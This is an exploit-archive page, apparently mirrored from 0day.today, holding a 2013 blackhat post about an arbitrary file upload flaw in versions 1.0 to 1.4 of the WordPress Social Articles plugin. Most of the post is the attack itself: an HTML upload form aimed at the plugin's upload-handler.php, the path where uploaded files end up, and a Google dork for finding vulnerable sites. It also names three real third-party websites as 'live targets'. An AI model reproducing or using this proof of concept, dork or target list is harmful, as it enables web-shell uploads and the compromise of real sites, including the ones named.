Lucene search
K

WordPress Plugins Social Articles Remote File Upload Vulnerability

🗓️ 05 Nov 2013 00:00:00Reported by ByakuyaType 
zdt
 zdt
🔗 0day.today👁 36 Views

WordPress Plugins Social Articles Remote File Upload Vulnerabilit

Code
###################################################################################################
#_________            .___        _______                ___.   .__        
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____  
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \ 
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/ 
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/ 
###################################################################################################
# Exploit Title: WordPress Plugins Social Articles Remote File Upload Vulnerability
# Author: Byakuya
# Date: 11/05/2013
# Vendor Homepage: http://wordpress.org/
# Plugins Link: http://wordpress.org/plugins/social-articles/
# Extension: .jpg , .png , .gif
# Affected Version: v1.0 - v1.4
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:wp-content/plugins/social-articles
# Tested on : Windows/Linux
# Description : WordPress plugins Social Articles suffers from a remote file upload vulnerability.
###################################################################################################

# Exploit & POC :

<form enctype="multipart/form-data" 
action="https://127.0.0.1/wordpress/wp-content/plugins/social-articles/upload-handler.php" method="post">
Please choose a file: <input name="userfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File path: 
http://127.0.0.1/wordpress/wp-content/uploads/[upload result name]

#Live Target :
http://thelayer.me/wp-content/plugins/social-articles/upload-handler.php
https://www.groovetemple.tv/wp-content/plugins/social-articles/upload-handler.php
http://news.costaricasun.com/wp-content/plugins/social-articles/upload-handler.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################

#  0day.today [2018-03-28]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation